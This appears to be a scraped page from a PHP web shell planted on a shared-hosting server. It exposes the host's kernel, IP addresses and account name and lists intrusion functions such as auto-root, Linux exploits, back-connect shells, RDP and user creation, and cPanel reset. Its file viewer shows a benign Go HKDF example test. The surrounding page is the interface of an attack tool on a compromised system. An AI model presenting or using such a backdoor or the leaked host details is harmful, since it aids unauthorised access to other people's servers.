Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
golang.org /
x /
crypto@v0.18.0 /
hkdf /
[ HOME SHELL ]
Name
Size
Permission
Action
example_test.go
1.23
KB
-r--r--r--
hkdf.go
2.71
KB
-r--r--r--
hkdf_test.go
12.97
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : example_test.go
// Copyright 2014 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package hkdf_test import ( "bytes" "crypto/rand" "crypto/sha256" "fmt" "io" "golang.org/x/crypto/hkdf" ) // Usage example that expands one master secret into three other // cryptographically secure keys. func Example_usage() { // Underlying hash function for HMAC. hash := sha256.New // Cryptographically secure master secret. secret := []byte{0x00, 0x01, 0x02, 0x03} // i.e. NOT this. // Non-secret salt, optional (can be nil). // Recommended: hash-length random value. salt := make([]byte, hash().Size()) if _, err := rand.Read(salt); err != nil { panic(err) } // Non-secret context info, optional (can be nil). info := []byte("hkdf example") // Generate three 128-bit derived keys. hkdf := hkdf.New(hash, secret, salt, info) var keys [][]byte for i := 0; i < 3; i++ { key := make([]byte, 16) if _, err := io.ReadFull(hkdf, key); err != nil { panic(err) } keys = append(keys, key) } for i := range keys { fmt.Printf("Key #%d: %v\n", i+1, !bytes.Equal(keys[i], make([]byte, 16))) } // Output: // Key #1: true // Key #2: true // Key #3: true }
Close